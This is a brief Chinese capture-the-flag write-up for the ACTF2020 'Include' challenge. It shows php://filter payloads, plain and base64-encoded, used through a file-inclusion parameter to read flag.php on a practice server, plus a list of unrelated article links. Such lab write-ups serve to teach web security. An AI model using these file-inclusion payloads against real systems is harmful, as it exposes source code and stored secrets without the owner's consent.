[ACTF2020 新生赛]Include 1

进入靶场:

根据题目提示的include,想到使用PHP://filter读取文件

读取文件payload:

# 明文读取
index.PHP?file1=PHP://filter/resource=file.txt

# 编码读取
index.PHP?file1=PHP://filter/read=convert.base64-encode/resource=file.txt

构造payload:

http://c4edc9e2-34ec-48a3-8616-117f4cdd45e9.node4.buuoj.cn:81/?file=PHP://filter/resource=flag.PHP

http://c4edc9e2-34ec-48a3-8616-117f4cdd45e9.node4.buuoj.cn:81/?file=PHP://filter/read=convert.base64-encode/resource=flag.PHP

 

 明文读取无效,尝试编码读取

 

 得到flag!

相关文章

统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...
统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...
前言 之前做了微信登录,所以总结一下微信授权登录并获取用户...
FastAdmin是我第一个接触的后台管理系统框架。FastAdmin是一...
之前公司需要一个内部的通讯软件,就叫我做一个。通讯软件嘛...
统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...